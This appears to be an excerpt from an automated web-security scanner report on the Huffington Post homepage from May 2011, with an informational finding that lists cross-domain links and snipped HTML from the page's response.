<li><a href="http://www.thenation.com/blogs/thebeat " target="_blank">John Nichols</a>
...[SNIP]...
<li><a href="http://online.wsj.com/public/page/peggy-noonan.html" target="_blank">Peggy Noonan</a>
...[SNIP]...
<li><a href="http://slate.msn.com/?id=3944&cp=68090&nav=navom" target="_blank">Jack Shafer</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/sweet/" target="_blank">Lynn Sweet</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/03/24/LI2005032402294.html" target="_blank">George Will</a>
...[SNIP]...
<li><a href="http://www.newser.com/off-the-grid/author/16/michael-wolff.html" target="_blank">Michael Wolff</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://www.engadget.com/">ENGADGET</a>
...[SNIP]...
<li><a href="http://sixapart.com">Powered by Movable Type</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6723616&c3=&c4=&c5=front&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-703240h&cg=0&cc=1&ts=noscript" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="http://vertical-stats.huffpost.com/?-1&&" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="//pixel.quantserve.com/pixel/p-6fTutip1SMLM2.gif?labels=Home" style="display:none" height="1" width="1" alt="Quantcast" />
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
<a href="#" class="close_modal" onclick="Modal.hideMask('hp_vertical_common_lightbox');return false;">
           <img width="70" height="22" alt="" src="http://s.huffpost.com/images/modal/close-home.gif" />
        </a>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

16.87. http://www.huffingtonpost.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.huffingtonpost.com/?icid=navbar_huffpo_main5

The response contains the following links to other domains:

http://abcnews.go.com/
http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://americablog.blogspot.com/
http://andrewsullivan.theatlantic.com/
http://aol.com/video/930944537001
http://appworld.blackberry.com/webstore/content/19143
http://b.scorecardresearch.com/p?c1=2&c2=6723616&c3=&c4=&c5=front&c6=&c15=&cj=1
http://bloggingheads.tv/
http://blogs.abcnews.com/george/
http://blogs.reuters.com/felix-salmon/
http://blogs.suntimes.com/sweet/
http://boingboing.net/
http://bravenewfilms.org/
http://dailycaller.com/
http://dailykos.com/
http://democracyarsenal.org/
http://digbysblog.blogspot.com/
http://drudgereport.com/
http://english.aljazeera.net/
http://firedoglake.com/
http://fivethirtyeight.blogs.nytimes.com/
http://hotlineblog.nationaljournal.com/
http://i.huffpost.com/gen/273980/thumbs/r-BARACK-OBAMA-OSAMA-BIN-LADEN-huge.jpg
http://krugman.blogs.nytimes.com/
http://m.huffpost.com/
http://mediamatters.org/blog/
http://money.cnn.com/magazines/fortune/
http://moviefone.com/
http://music.aol.com/
http://news.aol.com/
http://news.bbc.co.uk/
http://news.ft.com/home/us
http://news.google.com/
http://news.independent.co.uk/
http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/
http://news.yahoo.com/
http://nydailynews.com/
http://o.aolcdn.com/ads/adsWrapper.js
http://online.wsj.com/public/page/peggy-noonan.html
http://pixel.quantserve.com/pixel/p-6fTutip1SMLM2.gif?labels=Home
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://politicalwire.com/
http://redstate.com/
http://reporting.sunlightfoundation.com/blog/
http://rollingstone.com/
http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/
http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&v46755
http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&v46770
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007
http://s.huffpost.com/assets/js.php?f=v.js&v47014
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js
http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg
http://s.huffpost.com/images/blank.gif
http://s.huffpost.com/images/facebook_promo_connect.png?3
http://s.huffpost.com/images/hoton_twitter3.png
http://s.huffpost.com/images/loader.gif
http://s.huffpost.com/images/modal/close-home.gif
http://s.huffpost.com/images/quickview/gear_animation.gif
http://s.huffpost.com/images/social-profile/lightbox/huffpo_logo_lightbox_beta.png
http://s.huffpost.com/images/v/blog_column.png
http://s.huffpost.com/images/v/logos/logo_homepage_hp.gif?nv3
http://s.huffpost.com/images/v/something_to_say_button.png
http://s.huffpost.com/images/webslice12x12.png
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-703240h&cg=0&cc=1&ts=noscript
http://sixapart.com/
http://slate.msn.com/?id=3944&cp=68090&nav=navom
http://talkleft.com/
http://techcrunch.com/
http://television.aol.com/
http://thehill.com/
http://themoderatevoice.com/
http://time-blog.com/swampland/
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/davidbrooks/index.html
http://translogic.aolautos.com/
http://vertical-stats.huffpost.com/?-1&&
http://video.aol.com/
http://wsj.com/
http://www.accesshollywood.com/
http://www.autoblog.com/
http://www.bagnewsnotes.com/
http://www.bloomberg.com/
http://www.boston.com/news/globe/
http://www.buzzfeed.com/
http://www.buzzmachine.com/
http://www.c-span.org/
http://www.cbsnews.com/
http://www.chicagotribune.com/
http://www.cnn.com/
http://www.comicsalliance.com/
http://www.cq.com/
http://www.crooksandliars.com/
http://www.csmonitor.com/
http://www.davidcorn.com/
http://www.democracynow.org/
http://www.engadget.com/
http://www.eonline.com/
http://www.ew.com/
http://www.forbes.com/
http://www.foxnews.com/
http://www.frumforum.com/
http://www.funnyordie.com/
http://www.games.com/
http://www.globalpost.com/
http://www.globalvoicesonline.org/
http://www.gothamist.com/
http://www.guardian.co.uk/
http://www.hitchensweb.com/
http://www.instapundit.com/
http://www.joystiq.com/
http://www.juancole.com/
http://www.kcrw.com/news/programs/lr
http://www.kitchendaily.com/
http://www.kottke.org/
http://www.latimes.com/
http://www.linktv.org/mosaic/
http://www.mapquest.com/
http://www.marketwatch.com/News/Story/Story.aspx?column=Jon+Friedman%27s+Media+Web&siteid=mktw&dist=
http://www.mcclatchydc.com/
http://www.mediaite.com/
http://www.mmafighting.com/
http://www.motherjones.com/
http://www.msnbc.msn.com/
http://www.nationaljournal.com/columns/political-connections
http://www.nationalreview.com/lowry/lowry.asp/
http://www.nationalreview.com/thecorner/corner.asp
http://www.ndnblog.com/
http://www.newser.com/off-the-grid/author/16/michael-wolff.html
http://www.newsweek.com/
http://www.newsweek.com/blogs/kausfiles.html
http://www.npr.org/
http://www.nydailynews.com/topics/Stanley+Crouch
http://www.nytimes.com/
http://www.nytimes.com/2011/05/04/us/politics/04torture.html
http://www.observer.com/
http://www.observer.com/opinions_conason.asp
http://www.opinionjournal.com/diary/
http://www.pandagon.net/
http://www.patch.com/
http://www.pbs.org/newshour/
http://www.people.com/people
http://www.politico.com/
http://www.popeater.com/
http://www.propublica.org/
http://www.prospect.org/weblog/
http://www.publicintegrity.org/
http://www.rawstory.com/
http://www.reuters.com/
http://www.reuters.com/subjects/bin-laden-compound
http://www.rollcall.com/
http://www.salon.com/
http://www.seeingtheforest.com/
http://www.sfgate.com/
http://www.shelterpop.com/
http://www.slate.com/
http://www.slate.com/blogs/blogs/weigel/
http://www.stylelist.com/
http://www.stylelist.com/2011/04/28/swimsuit-tan-line/
http://www.suntimes.com/
http://www.talkingpointsmemo.com/
http://www.taylormarsh.com/
http://www.techcrunch.com/
http://www.telegraph.co.uk/
http://www.thatminoritything.com/
http://www.theatlantic.com/
http://www.theatlantic.com/james-fallows/
http://www.theatlantic.com/joshua-green/
http://www.thedailybeast.com/author/howard-kurtz/
http://www.theglobeandmail.com/
http://www.thenation.com/authors/eric-alterman
http://www.thenation.com/blogs/notion
http://www.thenation.com/blogs/thebeat
http://www.theroot.com/
http://www.theyoungturks.com/
http://www.thinkprogress.org/
http://www.thismodernworld.com/
http://www.time.com/time/?xid=huffpo-direct
http://www.timesonline.co.uk/section/0,,3,00.html
http://www.tmz.com/
http://www.truthdig.com/
http://www.tuaw.com/
http://www.usatoday.com/
http://www.usnews.com/usnews/politics/whispers/whisphome.htm
http://www.vanityfair.com/
http://www.vanityfair.com/online/wolcott
http://www.washingtonindependent.com/
http://www.washingtonmonthly.com/
http://www.washingtonpost.com/
http://www.washingtonpost.com/wp-dyn/content/linkset/2005/03/24/LI2005032402294.html
http://www.washingtonpost.com/wp-dyn/content/linkset/2005/04/22/LI2005042201099.html
http://www.washingtontimes.com/
http://www.wonkette.com/
http://www.youthradio.org/

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=6
Date: Thu, 05 May 2011 00:58:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" />

       <link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&v46770" type="text/css" media="screen" /><link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&v46755" type="text/css" media="screen" />

<link rel="alternate" type="application/rss+xml" title="The Full Feed" href="http://feeds.huffingtonpost.com/huffingtonpost/raw_feed" />
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47014"></script>


<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<h1>Using a mobile device? Go to <a href="http://m.huffpost.com">m.huffpost.com</a>
...[SNIP]...
<div class="huffpo_logo_lightbox">
                           <img src="http://s.huffpost.com/images/social-profile/lightbox/huffpo_logo_lightbox_beta.png" width="368" height="36" alt="" />
                       </div>
...[SNIP]...
<div id="huffpo_snn_is_loading" style="width:100%; text-align:center;"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div id="qr_tab_read_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...
<div id="qr_tab_news_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...

           <img src="http://s.huffpost.com/images/v/logos/logo_homepage_hp.gif?nv3" alt="The Huffington Post" width="660" height="70" />


...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://www.techcrunch.com">TECHCRUNCH</a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html" id="entry_id_0" >

                                                                                   <img id="headline_image" class="quickread_link" width="900" height="350" src="http://i.huffpost.com/gen/273980/thumbs/r-BARACK-OBAMA-OSAMA-BIN-LADEN-huge.jpg" />
                                                                                                   </a>
...[SNIP]...
<a href="#" onclick="javascript:window.external.AddToFavoritesBar('http://www.huffingtonpost.com/webslices/?v=home#home_slice', 'Home', 'slice');">
       <img src="http://s.huffpost.com/images/webslice12x12.png" width="12" height="12" alt="IE8 Web Slice" />
   </a>
...[SNIP]...
<div class="float_left" style="width:45px; height:31px; margin:0 5px;"><img src="http://s.huffpost.com/images/v/blog_column.png" width="44" height="31" /></div>
...[SNIP]...
<a href="/arianna-huffington"><img src="http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg" width="45" height="45" alt="Arianna Huffington" /></a>
...[SNIP]...
<h4><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink">Photos Show 3 Dead Men At Bin Laden Compound (GRAPHIC)</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"><img class="unloaded-image quickread_link" id="image_857719" longdesc="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-large300.jpg" alt="Osama Bin Laden Photos" width="300" height="21
...[SNIP]...
<h4 class="subhead"><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/administration-bin-laden-waterboarding_n_857529.html"><a href="http://www.nytimes.com/2011/05/04/us/politics/04torture.html"><em>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/william-h-mcraven-univers_n_857584.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<span class="afb-icon">
       <img class="apps-feeds_image" alt="Facebook" src="http://s.huffpost.com/images/blank.gif"/>
    </span>
...[SNIP]...
<span class="afb-icon">
                   <img class="apps-feeds_image" alt="Twitter" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<span class="afb-icon" >
       <img class="apps-feeds_image" alt="Apple" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Android');" href="/p/huffingtonpost-android-ap.html" target="_blank">
       <img class="apps-feeds_image" alt="Android" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<li id="af-blackberry" class="apps-feeds_button">
    <a class="afb-icon" onclick="HPTrack.Module('follow').click('Blackberry');" href="http://appworld.blackberry.com/webstore/content/19143" target="_blank">
       <img class="apps-feeds_image" alt="Blackberry" src="http://s.huffpost.com/images/blank.gif"/>
       </a>
...[SNIP]...
<a class="afb-icon" href="/subscription/" onclick="HPTrack.Module('follow').click('Email'); QuickSubscribeUser.pop2(); return false;" target="_blank">
                   <img class="apps-feeds_image" alt="Email" src="http://s.huffpost.com/images/blank.gif"/>
               </a>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Rss');" href="/syndication/" target="_blank">
       <img class="apps-feeds_image" alt="Rss" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<a href="#" id="facebook_promo_link"><img src="http://s.huffpost.com/images/facebook_promo_connect.png?3" class="facebook_promo_connect" width="230" height="44" /></a>
...[SNIP]...
<div class="snn_twitter_loading_img"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/royalwedding.aol.com/media/2011/05/pippa10facts_74x58.jpg" alt="" class="img_border unloaded-image" />
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/">AOL Royal Wedding: 10 Things You Should Know About Pippa Middleton</a>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://www.stylelist.com/2011/04/28/swimsuit-tan-line/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/www.stylelist.com/media/2011/04/tan-lines-mara-hoffman-swim-suits-590ssl042711_74x58.jpg" alt="" class="img_border unloa
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://www.stylelist.com/2011/04/28/swimsuit-tan-line/">Stylelist: 9 Sexy Swimsuits With The Most Awkward Tan Line Potential</a>
...[SNIP]...
<a href="#" onclick="SayIt.pop_email_form(); return false;">
           <img src="http://s.huffpost.com/images/v/something_to_say_button.png" width="300" height="58" alt="If you have something to say... Say it on the Huffington Post" />
       </a>
...[SNIP]...
<h4><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink">Drunk British Airways Passenger Reportedly Gropes Flight Attendant</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"><img class="unloaded-image quickread_link" id="image_857316" longdesc="http://i.huffpost.com/gen/274035/thumbs/s-ALCOHOL-large300.jpg" alt="Alcohol" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<h4 class="subhead"><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/panda-peacock-animal-chase_n_857572.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/unemployment-up-divorce-down_n_857503.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<h4><a href="http://aol.com/video/930944537001" target="_hplink">Proof That Some Dogs Can Talk?</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://aol.com/video/930944537001" target="_hplink"><img class="unloaded-image quickread_link" id="image_857475" longdesc="http://i.huffpost.com/gen/273725/thumbs/s-DOG-large300.jpg" alt="Dog" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/03/mac-os-x-tips-tricks_n_855102.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/jon-stewart-rips-pakistan_n_857329.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<li><a href="http://abcnews.go.com/" target="_blank">ABC</a></li>
<li><a href="http://www.accesshollywood.com" target="_blank">Access Hollywood</a>
...[SNIP]...
<li><a href="http://english.aljazeera.net/" target="_blank">Al Jazeera</a>
...[SNIP]...
<li><a href="http://news.aol.com/" target="_blank">AOL News</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/" target="_blank">The Atlantic</a>
...[SNIP]...
<li><a href="http://news.bbc.co.uk/" target="_blank">BBC</a></li>
<li><a href="http://www.bloomberg.com/" target="_blank">Bloomberg</a></li>
<li><a href="http://www.boston.com/news/globe/" target="_blank">Boston Globe</a>
...[SNIP]...
<li><a href="http://www.c-span.org" target="_blank">C-SPAN</a></li>
<li><a href="http://www.cbsnews.com/" target="_blank">CBS</a></li>
<li><a href="http://www.suntimes.com/" target="_blank">Chicago Sun-Times</a>
...[SNIP]...
<li><a href="http://www.chicagotribune.com/" target="_blank">Chicago Tribune</a>
...[SNIP]...
<li><a href="http://www.csmonitor.com/" target="_blank">Christian Science Monitor</a>
...[SNIP]...
<li><a href="http://www.publicintegrity.org/" target="_blank">Center for Public Integrity</a>
...[SNIP]...
<li><a href="http://www.cnn.com/" target="_blank">CNN</a></li>
<li><a href="http://www.cq.com" target="_blank">Congressional Quarterly</a>
...[SNIP]...
<li><a href="http://www.telegraph.co.uk/" target="_blank">Daily Telegraph</a>
...[SNIP]...
<li><a href="http://www.democracynow.org/" target="_blank">Democracy Now!</a>
...[SNIP]...
<li><a href="http://drudgereport.com/" target="_blank">Drudge Report</a>
...[SNIP]...
<li><a href="http://www.eonline.com/" target="_blank">E! Online</a></li>
<li><a href="http://www.ew.com/" target="_blank">Entertainment Weekly</a>
...[SNIP]...
<li><a href="http://www.forbes.com/" target="_blank">Forbes</a></li>
<li><a href="http://money.cnn.com/magazines/fortune/" target="_blank">Fortune</a>
...[SNIP]...
<li><a href="http://www.foxnews.com/" target="_blank">Fox News</a></li>
<li><a href="http://news.ft.com/home/us" target="_blank">Financial Times</a>
...[SNIP]...
<li><a href="http://www.theglobeandmail.com/" target="_blank">Globe and Mail</a>
...[SNIP]...
<li><a href="http://www.GlobalPost.com" target="_blank">GlobalPost.com</a>
...[SNIP]...
<li><a href="http://www.globalvoicesonline.org/" target="_blank">GlobalVoices</a>
...[SNIP]...
<li><a href="http://news.google.com/" target="_blank">Google News</a>
...[SNIP]...
<li><a href="http://www.guardian.co.uk/" target="_blank">Guardian</a></li>
<li><a href="http://thehill.com/" target="_blank">The Hill</a></li>
<li><a href="http://news.independent.co.uk/" target="_blank">Independent</a>
...[SNIP]...
<li><a href="http://www.latimes.com/" target="_blank">Los Angeles Times</a>
...[SNIP]...
<li><a href="http://www.mcclatchydc.com/" target="_blank">McClatchy</a></li>
<li><a href="http://www.mediaite.com/" target="_blank">Mediaite</a></li>
<li><a href="http://www.linktv.org/mosaic/" target="_blank">Mosaic</a></li>
<li><a href="http://www.motherjones.com/" target="_blank">Mother Jones</a>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/" target="_blank">MSNBC</a></li>
<li><a href="http://nydailynews.com/" target="_blank">New York Daily News</a>
...[SNIP]...
<li><a href="http://www.observer.com/" target="_blank">New York Observer</a>
...[SNIP]...
<li><a href="http://www.nytimes.com/" target="_blank">New York Times</a>
...[SNIP]...
<li><a href="http://www.npr.org/" target="_blank">NPR</a></li>
<li><a href="http://www.pbs.org/newshour/" target="_blank">PBS NewsHour</a>
...[SNIP]...
<li><a href="http://www.newsweek.com" target="_blank">Newsweek</a></li>
<li><a href="http://www.people.com/people" target="_blank">People</a></li>
<li><a href="http://www.politico.com/" target="_blank">Politico</a></li>
<li><a href="http://www.propublica.org/"target="_blank">ProPublica</a>
...[SNIP]...
<li><a href="http://www.reuters.com/" target="_blank">Reuters</a>
...[SNIP]...
<li><a href="http://www.rollcall.com/" target="_blank">Roll Call</a></li>
<li><a href="http://rollingstone.com" target="_blank">Rolling Stone</a>
...[SNIP]...
<li><a href="http://www.theroot.com" target="_blank">The Root</a></li>
